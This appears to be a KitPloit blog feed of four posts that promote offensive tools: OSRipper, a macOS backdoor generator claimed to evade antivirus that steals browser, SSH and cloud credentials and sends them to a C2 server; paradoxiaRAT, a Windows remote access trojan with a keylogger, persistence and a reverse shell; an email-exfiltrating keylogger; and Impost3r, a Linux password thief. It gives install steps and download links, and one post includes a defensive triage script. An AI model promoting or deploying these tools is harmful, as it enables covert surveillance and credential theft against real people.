tag:blogger.com,1999:blog-83172222311336605472024-03-19T02:21:46.575-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣Unknownnoreply@blogger.comBlogger23125tag:blogger.com,1999:blog-8317222231133660547.post-68343441882737084952022-09-22T08:30:00.001-03:002022-09-22T08:30:00.205-03:00OSRipper - AV Evading OSX Backdoor And Crypter Framework<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgbR92Al9Iu7-v4Ki-Atw6q3w8R3epKooAWQ5K4feSMG2gsDCpPFUzwQvIBZHKAQll8IhsoX_DF3PhrJGfa6HOPUzIdSNUrENcm9hWtL9IM8CzSlv7J5McZvN1822KuRntsQPgIM73X_OZiaQnrgBo2omRcr1HbjiiRzmsdvgng1yKKvebWKhf-0dZlA/s350/OSRipper_1_OSRipper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="84" data-original-width="350" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgbR92Al9Iu7-v4Ki-Atw6q3w8R3epKooAWQ5K4feSMG2gsDCpPFUzwQvIBZHKAQll8IhsoX_DF3PhrJGfa6HOPUzIdSNUrENcm9hWtL9IM8CzSlv7J5McZvN1822KuRntsQPgIM73X_OZiaQnrgBo2omRcr1HbjiiRzmsdvgng1yKKvebWKhf-0dZlA/s16000/OSRipper_1_OSRipper.png" /></a></div><p><br /></p>
<p dir="auto">OSRipper is a backdoor <a href="https://www.kitploit.com/search/label/Generator" target="_blank" title="generator">generator</a> and crypter that specialises in macOS (Apple silicon / M1) malware and that, according to its author, is fully <a href="https://www.kitploit.com/search/label/Undetectable" target="_blank" title="undetectable">undetectable</a> (FUD) by antivirus engines. It also runs on Windows, but Windows is not supported for now, the output is NOT FUD there (yet, at least), and the author is not focusing on Windows.</p>
<p dir="auto"><strong>You can also PM me on Discord (SubGlitch1#2983) for support or to ask for new features.</strong></p><a name='more'></a>
<h2 dir="auto">Features</h2>
<ul dir="auto">
<li>FUD (for macOS)</li>
<li>Cloaks as an official app (Microsoft, ExpressVPN, etc.)</li>
<li>Dumps system info, browser history, logins, ssh/aws/azure/gcloud credentials, clipboard content, local users, etc. (collection borrowed from Cedric Owens' SwiftBelt)</li>
<li>Encrypted communications</li>
<li>Rootkit-like Behaviour</li>
<li>Every Backdoor generated is entirely unique</li>
</ul>
<h2 dir="auto">Description</h2>
<p dir="auto">Please check the wiki for information on how OSRipper works (it changes very frequently):</p>
<p dir="auto"><a href="https://github.com/SubGlitch1/OSRipper/wiki" rel="nofollow" target="_blank" title="https://github.com/SubGlitch1/OSRipper/wiki">https://github.com/SubGlitch1/OSRipper/wiki</a></p>
<p dir="auto">Here are example backdoors generated with OSRipper:</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj06eulcwA3cFF-LHX-87KhIJo45Naa70fncqKpjU46vsiT5wprhGdT18yzMO3fg3hciMMFyBlxx-mBIzt1Es-emEtOqaJz7-M8HhpPs218c6penNJRAOGP3YXF3Fm8jpEu4Hrd555rV6rc81KTJ2moGHsECfYg6nZLK-Exo83j5rW_2leLKsolLlgLGg/s790/OSRipper_3_example.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="790" data-original-width="580" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj06eulcwA3cFF-LHX-87KhIJo45Naa70fncqKpjU46vsiT5wprhGdT18yzMO3fg3hciMMFyBlxx-mBIzt1Es-emEtOqaJz7-M8HhpPs218c6penNJRAOGP3YXF3Fm8jpEu4Hrd555rV6rc81KTJ2moGHsECfYg6nZLK-Exo83j5rW_2leLKsolLlgLGg/w470-h640/OSRipper_3_example.png" width="470" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1_n3eqs-u1R7A-7gpkBA5nJXACaKRNd2YKVZgDtO7HgIcn1EsTKm1Z2JeyDa1fZ0fjYRuGvyOJGbxd8cKEa7X1CjdoQ45FhsQm9s9z54exYkj1_YTQSApbcWDC1R2ZWgaVoY_2npfW50pyL35YKnCk9BTvnZqPvTsvF54ec1CH19uX30aGbA2E_9xYA/s2615/OSRipper_4_vt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1590" data-original-width="2615" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1_n3eqs-u1R7A-7gpkBA5nJXACaKRNd2YKVZgDtO7HgIcn1EsTKm1Z2JeyDa1fZ0fjYRuGvyOJGbxd8cKEa7X1CjdoQ45FhsQm9s9z54exYkj1_YTQSApbcWDC1R2ZWgaVoY_2npfW50pyL35YKnCk9BTvnZqPvTsvF54ec1CH19uX30aGbA2E_9xYA/w640-h390/OSRipper_4_vt.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip3h53atetp7WHcekT2iEVypTbmEKLlrrSV9WxEZ41utdqF_AfI4SeN5ovGrI1biRvJTDUsIBOMPXF-XdjfgnzzRW0x_XoQINlAZhTv_6oIe1wrcLVxbhoXOXhPLVw3cGXPc2QezS6iJ0o6jvA7aC3sA5xCPU0rlqk6B3X-qcFmajK1wDyEEnQOSBAPg/s2741/OSRipper_5_vt_app.png" imageanchor="1" style="margin-left: 
1em; margin-right: 1em;"><img border="0" data-original-height="1611" data-original-width="2741" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip3h53atetp7WHcekT2iEVypTbmEKLlrrSV9WxEZ41utdqF_AfI4SeN5ovGrI1biRvJTDUsIBOMPXF-XdjfgnzzRW0x_XoQINlAZhTv_6oIe1wrcLVxbhoXOXhPLVw3cGXPc2QezS6iJ0o6jvA7aC3sA5xCPU0rlqk6B3X-qcFmajK1wDyEEnQOSBAPg/w640-h376/OSRipper_5_vt_app.png" width="640" /></a></div><p dir="auto"><br /></p>
<p dir="auto">macOS .app bundles built by OSRipper look like this on VirusTotal.</p>
<h2 dir="auto">Getting Started</h2>
<h3 dir="auto">Dependencies</h3>
<p dir="auto">You need Python. If you do not wish to install Python you can download a compiled release instead.
The Python dependencies are listed in the requirements.txt file.</p>
<p dir="auto">Since version 1.4 you will need <a href="https://www.kitploit.com/search/label/Metasploit" target="_blank" title="metasploit">Metasploit</a> installed and on your PATH so that it can handle the Meterpreter listeners.</p>
<h2 dir="auto">Installing</h2>
<h3 dir="auto">Linux</h3>
<div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="apt install git python3 python3-pip -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt"><pre><code>apt install git python3 python3-pip -y<br />git clone https://github.com/SubGlitch1/OSRipper.git<br />cd OSRipper<br />pip3 install -r requirements.txt</code></pre></div>
<h3 dir="auto">Windows</h3>
<div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt"><pre><code>git clone https://github.com/SubGlitch1/OSRipper.git<br />cd OSRipper<br />pip3 install -r requirements.txt</code></pre></div>
<p dir="auto">or download the latest release from <a href="https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3" rel="nofollow" target="_blank" title="https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3">https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3</a></p>
<h3 dir="auto">Executing program</h3>
<p dir="auto">Just run:</p>
<div><pre><code>sudo python3 main.py<br /></code></pre></div>
<h2 dir="auto">Contributing</h2>
<p dir="auto">Please feel free to fork and open pull requests. Suggestions and criticism are appreciated as well.</p>
<h2 dir="auto">Roadmap</h2>
<h3 dir="auto">v0.1</h3>
<ul dir="auto">
<li><div>✅ Get detection down to 0/26 on antiscan.me</div></li>
<li><div>✅ Add changelog</div></li>
<li><div>✅ Daemonise backdoor</div></li>
<li><div>✅ Add crypter</div></li>
<li><div>✅ Add more backdoor templates</div></li>
<li><div>✅ Get detection down to 0/68 on VT (for macOS malware)</div></li>
</ul>
<h3 dir="auto">v0.2</h3>
<ul dir="auto">
<li><div>✅ Add AntiVM</div></li>
<li>[ ] Implement Tor hidden services</li>
<li><div>✅ Add logger</div></li>
<li><div>✅ Add password stealer</div></li>
<li>[ ] Add keylogger</li>
<li><div>✅ Add some new evasion options</div></li>
<li><div>✅ Add SilentMiner</div></li>
<li>[ ] Make a proper C2 server</li>
</ul>
<h3 dir="auto">v0.3</h3>
<p dir="auto">Coming soon</p>
<h2 dir="auto">Help</h2>
<p dir="auto">Just open an issue and I'll make sure to get back to you.</p>
<h2 dir="auto">Changelog</h2>
<ul dir="auto">
<li>
<p dir="auto">0.2.1</p>
<ul dir="auto">
<li>OSRipper now pulls all information from the target and sends it to the <a href="https://www.kitploit.com/search/label/C2%20Server" target="_blank" title="c2 server">C2 server</a> over sockets. This includes browser history, passwords, system information, keys, etc.</li>
</ul>
</li>
<li>
<p dir="auto">0.1.6</p>
<ul dir="auto">
<li>The process now masquerades as com.apple.system.monitor and drops itself into /Users/Shared</li>
</ul>
</li>
<li>
<p dir="auto">0.1.5</p>
<ul dir="auto">
<li>Added Crypter</li>
</ul>
</li>
<li>
<p dir="auto">0.1.4</p>
<ul dir="auto">
<li>Added 4th Module</li>
</ul>
</li>
<li>
<p dir="auto">0.1.3</p>
<ul dir="auto">
<li>Got detection on VT down to 0. Made the process invisible.</li>
</ul>
</li>
<li>
<p dir="auto">0.1.2</p>
<ul dir="auto">
<li>Added 3rd module and listener</li>
</ul>
</li>
<li>
<p dir="auto">0.1.1</p>
<ul dir="auto">
<li>Initial Release</li>
</ul>
</li>
</ul>
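<p dir="auto">The 0.1.6 entry above hands a defender two concrete artifacts: a process named com.apple.system.monitor and a drop location of /Users/Shared. The triage script below is an added example written for this page, not code from OSRipper or its author. It lists executables carrying a com.apple.* name in a directory Apple never writes to, then looks for launchd plists that reference them. The directory arguments, the LaunchAgents location and the constructed decoy tree it builds for its self-check are assumptions; on a real Mac you would pass /Users/Shared and ~/Library/LaunchAgents and follow up on any hit with <code>codesign -dv</code>.</p>

```shell
#!/bin/sh
# Added example, not part of OSRipper or the original post: triage check for
# the artifact described in the 0.1.6 changelog entry (a process named
# com.apple.system.monitor dropped into /Users/Shared). Apple ships nothing
# under /Users/Shared, so an executable there with a com.apple.* name, and any
# launchd plist that points at it, deserves a look. Directories are passed as
# arguments so the check can run against a constructed tree on any POSIX host
# (assumption: on a Mac you would pass /Users/Shared and ~/Library/LaunchAgents).

# Print executables (hidden ones included) in DIR whose name starts with
# "com.apple.". Returns 0 if any were found, 1 if none.
find_apple_lookalikes() {
    dir="$1"; found=1
    for f in "$dir"/com.apple.* "$dir"/.com.apple.*; do
        [ -f "$f" ] && [ -x "$f" ] || continue   # unmatched glob or not executable
        printf '%s\n' "$f"
        found=0
    done
    return "$found"
}

# Print launchd plists in PLISTDIR that mention TARGET (the persistence hook
# for a dropped binary). Returns 0 if any were found, non-zero otherwise.
find_launchd_refs() {
    plistdir="$1"; target="$2"
    grep -lF -- "$target" "$plistdir"/*.plist 2>/dev/null
}

# Build a constructed tree under DIR for the self-check: a harmless decoy with
# the name from the changelog, two files that must not be flagged, and a
# LaunchAgent that runs the decoy.
make_demo_tree() {
    mkdir -p "$1/Shared" "$1/LaunchAgents"
    printf '#!/bin/sh\n' > "$1/Shared/com.apple.system.monitor"   # decoy, not real malware
    chmod +x "$1/Shared/com.apple.system.monitor"
    printf 'notes\n' > "$1/Shared/README.txt"                      # benign file
    printf 'x\n' > "$1/Shared/com.apple.not_executable"             # lookalike name, not executable
    cat > "$1/LaunchAgents/com.apple.system.monitor.plist" <<EOF
<plist version="1.0"><dict>
<key>Label</key><string>com.apple.system.monitor</string>
<key>ProgramArguments</key><array><string>$1/Shared/com.apple.system.monitor</string></array>
</dict></plist>
EOF
    cat > "$1/LaunchAgents/com.example.updater.plist" <<'EOF'
<plist version="1.0"><dict><key>Label</key><string>com.example.updater</string></dict></plist>
EOF
}

# Self-check against the constructed tree.
demo=$(mktemp -d)
make_demo_tree "$demo"
find_apple_lookalikes "$demo/Shared" | while read -r hit; do
    echo "suspicious executable: $hit"
    find_launchd_refs "$demo/LaunchAgents" "$hit" | sed 's/^/  persisted by: /'
done
rm -rf "$demo"
```

<p dir="auto">Nothing in the script is macOS-specific, so it runs unchanged on Linux against the constructed tree. Its output is a list of paths, which is what you pivot on next: code signature, hash, and which processes and network connections the file owns.</p>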
<h2 dir="auto">License</h2>
<p dir="auto">MIT</p>
<h2 dir="auto">Acknowledgments</h2>
<p dir="auto">Inspiration, code snippets, etc.</p>
<ul dir="auto">
<li><a href="https://github.com/htr-tech/PyObfuscate" rel="nofollow" target="_blank" title="htr">htr</a></li>
<li><a href="https://github.com/cedowens/SwiftBelt" rel="nofollow" target="_blank" title="swiftbelt">swiftbelt</a></li>
</ul>
<h2 dir="auto">Support</h2>
<p dir="auto">I am very sorry to even write this here, but my finances are not looking good right now.
If you appreciate my work I would be really happy about any donation. You do NOT have to; this is solely optional.</p>
<p dir="auto">BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T</p>
<h2 dir="auto">Disclaimer</h2>
<p dir="auto">I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.</p>
<br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/SubGlitch1/OSRipper" rel="nofollow" target="_blank" title="Download OSRipper">Download OSRipper</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-76651298695618524852020-11-10T08:30:00.012-03:002020-11-10T08:30:00.795-03:00paradoxiaRAT - Native Windows Remote Access Tool<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-2OMBa4O_Omw/X6iEh6TOGrI/AAAAAAAAUSk/AGux3zKuZzkooB1dXf3UpCQNQYNzSKVXwCNcBGAsYHQ/s1082/paradoxiaRAT_1_logo.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="163" data-original-width="1082" height="96" src="https://1.bp.blogspot.com/-2OMBa4O_Omw/X6iEh6TOGrI/AAAAAAAAUSk/AGux3zKuZzkooB1dXf3UpCQNQYNzSKVXwCNcBGAsYHQ/w640-h96/paradoxiaRAT_1_logo.png" width="640" /></a></div><p><br /></p> Paradoxia <a href="https://www.kitploit.com/search/label/Remote%20Access" target="_blank" title="Remote Access">Remote Access</a> Tool. 
<br /><span><a name='more'></a></span><div><br /><span style="font-size: x-large;"><b>Features</b></span><br /> <br /><b>Paradoxia Console</b></div><div><b><br /></b> <table> <tr> <th>Feature</th> <th>Description</th> </tr> <tr> <td>Easy to use</td> <td>Paradoxia is extremely easy to use; so far the easiest RAT!</td> </tr> <tr> <td>Root Shell</td> <td>-</td> </tr> <tr> <td>Automatic Client build</td> <td>Build the Paradoxia client easily, with or without an icon of your choice.</td> </tr> <tr> <td>Multithreaded</td> <td>Multithreaded console server; you can have multiple sessions.</td> </tr> <tr> <td>Toast Notifications</td> <td>Desktop notification on new session.</td> </tr> <tr> <td>Configurable Settings</td> <td>Configurable values in <code>paradoxia.ini</code></td> </tr> <tr> <td>Kill Sessions</td> <td>Kill sessions without entering the session.</td> </tr> <tr> <td>View Session information</td> <td>View session information without entering the session.</td> </tr> </table> <br /><b>Paradoxia Client</b><br /><br /><table> <tr> <th>Feature</th> <th>Description</th> </tr> <tr> <td>Stealth</td> <td>Runs in the background.</td> </tr> <tr> <td>Full File Access</td> <td>Full access to the entire file system.</td> </tr> <tr><td>Persistence</td> <td>Installs inside APPDATA and has startup persistence via a Registry key.</td> </tr> <tr> <td>Upload / Download Files</td> <td>Upload and download files.</td> </tr> <tr> <td>Screenshot</td> <td>Take a screenshot.</td> </tr> <tr> <td>Mic Recording</td> <td>Record the microphone.</td> </tr> <tr> <td>Chrome Password Recovery</td> <td>Dump Chrome passwords using a reflective DLL (does not work on the latest version).</td> </tr> <tr> <td>Keylogger</td> <td>Log keystrokes and save them to a file via a reflective DLL.</td> </tr> <tr> <td>Geolocate</td> <td>Geolocate the Paradoxia client.</td> </tr> <tr> <td>Process Info</td> <td>Get process information.</td> </tr> <tr> <td>DLL Injection</td> <td>Reflective <a href="https://www.kitploit.com/search/label/DLL%20Injection" target="_blank" title="DLL Injection">DLL Injection</a> over socket: load your own reflective DLL, or use the ones available <a href="https://github.com/quantumcored/maalik/tree/master/payloads" rel="nofollow" target="_blank" title="here">here</a>.</td> </tr> <tr> <td>Power off</td> <td>Power off the client system.</td> </tr> <tr> <td>Reboot</td> <td>Reboot the client system.</td> </tr> <tr> <td>MSVC + MINGW Support</td> <td>A Visual Studio project is also included.</td> </tr> <tr> <td>Reverse Shell</td> <td>Stable reverse shell.</td> </tr> <tr> <td>Small Client</td> <td>Maximum size is 30 KB without an icon.</td> </tr> </table> <br /><span style="font-size: x-large;"><b>Installation (via APT)</b></span><br /> <div><pre><code>$ git clone https://github.com/quantumcored/paradoxia<br />$ cd paradoxia<br />$ sudo ./install.sh</code></pre></div> <br /><span style="font-size: x-large;"><b>Example Usage</b></span><br /> <ul> <li>Run Paradoxia</li> </ul> <pre><code>sudo python3 paradoxia.py<br /></code></pre> <ul> <li>Once in the Paradoxia console, the first step is to build the client, preferably with an icon.</li> </ul> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-78K4jAA8TFk/X6iEtAID_II/AAAAAAAAUSo/vENXkn4tfB8PIfgmajYM9Js2sIPBntGBQCNcBGAsYHQ/s720/paradoxiaRAT_3_pd1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="307" data-original-width="720" height="272" src="https://1.bp.blogspot.com/-78K4jAA8TFk/X6iEtAID_II/AAAAAAAAUSo/vENXkn4tfB8PIfgmajYM9Js2sIPBntGBQCNcBGAsYHQ/w640-h272/paradoxiaRAT_3_pd1.png" width="640" /></a></div><p> </p> <ul> <li>Once built, as you can see below, it is detected by <a href="https://www.kitploit.com/search/label/Windows%20Defender" target="_blank" title="Windows Defender">Windows Defender</a> as severe malware, which is expected, since it IS malware.</li> </ul> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1nn4-hFXhaY/X6iEzAkRtuI/AAAAAAAAUSw/6W9qRaPI3QQ2Y9HxsSl5B_WBQMmpSa9kACNcBGAsYHQ/s522/paradoxiaRAT_4_pd2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="417" data-original-width="522" src="https://1.bp.blogspot.com/-1nn4-hFXhaY/X6iEzAkRtuI/AAAAAAAAUSw/6W9qRaPI3QQ2Y9HxsSl5B_WBQMmpSa9kACNcBGAsYHQ/s16000/paradoxiaRAT_4_pd2.png" /></a></div><p> </p> <ul> <li>I'm going to transfer the client to a <a href="https://www.kitploit.com/search/label/Windows%2010" target="_blank" title="Windows 10">Windows 10</a> virtual machine and execute it. After executing it, it appears under Startup programs in Task Manager.</li> </ul> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-rilXASL1VCU/X6iE5cXLL4I/AAAAAAAAUS0/dnKlYc7-NmUD0uLC2O8ubZQzXdZq0QvhwCNcBGAsYHQ/s645/paradoxiaRAT_5_pd3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="303" data-original-width="645" src="https://1.bp.blogspot.com/-rilXASL1VCU/X6iE5cXLL4I/AAAAAAAAUS0/dnKlYc7-NmUD0uLC2O8ubZQzXdZq0QvhwCNcBGAsYHQ/s16000/paradoxiaRAT_5_pd3.png" /></a></div><p> </p> <ul> <li>It has also copied itself into the AppData directory and installed under the name we specified during the build.</li> </ul> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-l3Po8aWSndo/X6iE-sUDfjI/AAAAAAAAUS8/MSoBQOySdBQ2zIAXsGcGnj6kQOhNJqw9gCNcBGAsYHQ/s635/paradoxiaRAT_6_pdmiss.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="277" data-original-width="635" src="https://1.bp.blogspot.com/-l3Po8aWSndo/X6iE-sUDfjI/AAAAAAAAUS8/MSoBQOySdBQ2zIAXsGcGnj6kQOhNJqw9gCNcBGAsYHQ/s16000/paradoxiaRAT_6_pdmiss.png" /></a></div><p> </p> <ul> <li>At the same time, I get a session on the server side.</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-tq5Vh2qW3lk/X6iFELdImCI/AAAAAAAAUTA/1bRTKpgidwIGR0igWndG1NGNMEnx4_fkwCNcBGAsYHQ/s428/paradoxiaRAT_7_pd4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="428" src="https://1.bp.blogspot.com/-tq5Vh2qW3lk/X6iFELdImCI/AAAAAAAAUTA/1bRTKpgidwIGR0igWndG1NGNMEnx4_fkwCNcBGAsYHQ/s16000/paradoxiaRAT_7_pd4.png" /></a></div><p><br /></p> <ul> <li>The first thing I'd do is get into the session and view its information.</li> </ul> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-STajv6__jVo/X6iFKKxrNfI/AAAAAAAAUTI/V-26BVQsq-kPLDsz1IuY_AZjyS47zA8JQCNcBGAsYHQ/s355/paradoxiaRAT_8_pd5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="228" data-original-width="355" src="https://1.bp.blogspot.com/-STajv6__jVo/X6iFKKxrNfI/AAAAAAAAUTI/V-26BVQsq-kPLDsz1IuY_AZjyS47zA8JQCNcBGAsYHQ/s16000/paradoxiaRAT_8_pd5.png" /></a></div><p> </p> <ul> <li>There are plenty of things we could do now, but as an example I will demonstrate keylogging.</li> </ul> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-IXckOjyHZQM/X6iFRMPqBrI/AAAAAAAAUTQ/qoI7sZXcp5gKNgZMQ9CjieVqILKghLMFQCNcBGAsYHQ/s438/paradoxiaRAT_9_pd7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="226" data-original-width="438" src="https://1.bp.blogspot.com/-IXckOjyHZQM/X6iFRMPqBrI/AAAAAAAAUTQ/qoI7sZXcp5gKNgZMQ9CjieVqILKghLMFQCNcBGAsYHQ/s16000/paradoxiaRAT_9_pd7.png" /></a></div><p> </p> <p>You can see in the image above that it reports the DLL was injected successfully, and in the file listing there is a file named <code>log.log</code>, which contains the logged keystrokes.</p> <ul> <li>Let's view the captured keystrokes.</li></ul><div><br /></div><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-fUuYOzNfNBU/X6iFXbEdToI/AAAAAAAAUTY/rX-AywROmoEhtwU2bRcYdI5JXJkh-NwIgCNcBGAsYHQ/s596/paradoxiaRAT_10_pd8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="579" data-original-width="596" src="https://1.bp.blogspot.com/-fUuYOzNfNBU/X6iFXbEdToI/AAAAAAAAUTY/rX-AywROmoEhtwU2bRcYdI5JXJkh-NwIgCNcBGAsYHQ/s16000/paradoxiaRAT_10_pd8.png" /></a></div><br /><p></p><span style="font-size: x-large;"><b>Changelogs</b></span><br /> <ul> <li>This repository was previously home to three tools: <a href="https://github.com/quantumcored/iris" rel="nofollow" target="_blank" title="Iris">Iris</a>, <a href="https://github.com/quantumcored/thawne" rel="nofollow" target="_blank" title="Thawne">Thawne</a> and the previous version of Paradoxia. They can be found <a href="https://github.com/quantumcored/paradoxiaRAT/tree/930a396cb64744de0d8cd14e55540a97ba9fa452" rel="nofollow" target="_blank" title="here">here</a>.</li> <li>Everything has changed: the client has been rewritten, Infodb was removed, many new features were added, and stability improved.</li> </ul> <br /><span style="font-size: large;"><b>Developer</b></span><br /> <p>Hi, my name's <a href="https://github.com/quantumcore" rel="nofollow" target="_blank" title="Fahad">Fahad</a>.
You may contact me, on <a href="https://discordapp.com/invite/8snh7nx" rel="nofollow" target="_blank" title="Discord">Discord</a> or <a href="https://quantumcored.com/" rel="nofollow" target="_blank" title="My Website">My Website</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/quantumcored/paradoxiaRAT" rel="nofollow" target="_blank" title="Download paradoxiaRAT">Download paradoxiaRAT<br /></a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-49309963479680081212020-07-19T18:00:00.000-04:002020-07-19T18:00:12.878-04:00Keylogger - Get Keyboard, Mouse, ScreenShot, Microphone Inputs From Target Computer And Send To Your Mail<span style="font-size: x-large;"><b>Inputs To Mail.</b></span><br />
Get keyboard, mouse, screenshot and microphone input from the target computer and send it to your mail. The purpose of the project is <a href="https://www.kitploit.com/search/label/Testing" target="_blank" title="testing">testing</a> the security of information systems.<br />
<br />
<span style="font-size: large;"><b>INSTALLATION</b></span><br />
<pre><code>pip install pynput
</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-wSqlDnCgwvs/Xwuq0NZBmdI/AAAAAAAATHc/DIFI5637vNI0nw0hHBtnREduz0KteonKACNcBGAsYHQ/s1600/Keylogger_1_Ads%2525C4%2525B1z.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="239" data-original-width="718" height="212" src="https://1.bp.blogspot.com/-wSqlDnCgwvs/Xwuq0NZBmdI/AAAAAAAATHc/DIFI5637vNI0nw0hHBtnREduz0KteonKACNcBGAsYHQ/s640/Keylogger_1_Ads%2525C4%2525B1z.png" width="640" /></a></div>
<a name='more'></a><br />
<span style="font-size: large;"><b>USAGE</b></span><br />
•<strong>Set your own MAIL and PASSWORD in "keylogger.py".</strong><br />
•<strong>Run main.py on the target computer.</strong><br />
•<strong>Every 10 seconds you receive the data from the target computer.</strong><br />
•<strong>If the target finds the code and opens the file to learn your MAIL and PASSWORD, the program deletes itself.</strong><br />
Note that the mail credentials live in plain text inside keylogger.py, so the self-delete above is all that protects them if the file is recovered from disk.<br />
<br />
<span style="font-size: large;"><b>USAGE TEMP MAIL API</b></span><br />
<br />
<b><a href="https://temp-mail.org/en/api/" rel="nofollow" target="_blank" title="https://temp-mail.org/en/api/">https://temp-mail.org/en/api/</a></b><br />
<br />
<span style="font-size: large;"><b>ANTIVIRUS TEST</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-RJ_f1jq8KQ8/Xwuq_DUJpdI/AAAAAAAATHg/XHyoVYjF5jg3IpBOmvvsDVK6hK3bmt9pACNcBGAsYHQ/s1600/Keylogger_2_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="211" data-original-width="682" height="198" src="https://1.bp.blogspot.com/-RJ_f1jq8KQ8/Xwuq_DUJpdI/AAAAAAAATHg/XHyoVYjF5jg3IpBOmvvsDVK6hK3bmt9pACNcBGAsYHQ/s640/Keylogger_2_1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Gjuj06R1yaE/Xwuq_Ogmr4I/AAAAAAAATHk/ef8uXSWRvLAHxwGFjEq4h7xz40K6z4XqwCNcBGAsYHQ/s1600/Keylogger_3_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="385" data-original-width="987" height="248" src="https://1.bp.blogspot.com/-Gjuj06R1yaE/Xwuq_Ogmr4I/AAAAAAAATHk/ef8uXSWRvLAHxwGFjEq4h7xz40K6z4XqwCNcBGAsYHQ/s640/Keylogger_3_2.png" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/aydinnyunus/Keylogger" rel="nofollow" target="_blank" title="Download Keylogger">Download Keylogger</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-18820222589150219202020-06-08T17:30:00.000-04:002020-06-08T17:30:10.334-04:00Impost3r - A Linux Password Thief<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Kn5lary_ATs/Xt3HlwvQ1oI/AAAAAAAASsc/TN5IWlHNmFgkjXijxQh_IcNC2C8kfLAogCNcBGAsYHQ/s1600/Impost3r_1_Impost3r.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="258" data-original-width="1068" height="154" src="https://1.bp.blogspot.com/-Kn5lary_ATs/Xt3HlwvQ1oI/AAAAAAAASsc/TN5IWlHNmFgkjXijxQh_IcNC2C8kfLAogCNcBGAsYHQ/s640/Impost3r_1_Impost3r.png" width="640" /></a></div>
<br />
Impost3r is a tool written in C that aims to steal several kinds of Linux passwords (ssh, su and sudo).<br />
An attacker who already has a foothold can use Impost3r to set a trap that captures legitimate users' passwords.<br />
<blockquote>
This tool is limited to security research and teaching, and the user
bears all legal and related responsibilities caused by the use of this
tool! The author does not assume any legal and related responsibilities!</blockquote>
<a name='more'></a><h2>
Features</h2>
<ul>
<li>Automatically cleans its tracks</li>
<li>Uses DNS to transfer the captured passwords</li>
<li>Hard for legitimate users to notice</li>
</ul>
<h2>
Dependencies</h2>
<ul>
<li>gcc</li>
</ul>
<h2>
Usage</h2>
